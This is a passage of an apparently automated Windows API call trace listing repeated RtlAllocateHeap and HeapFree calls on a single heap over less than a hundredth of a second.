HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.995] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.995] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.996] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.996] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.997] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.997] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.998] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.998] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.999] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.999] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.000] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.000] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.001] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.001] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.002] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.002] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0130.003] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0130.003] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) 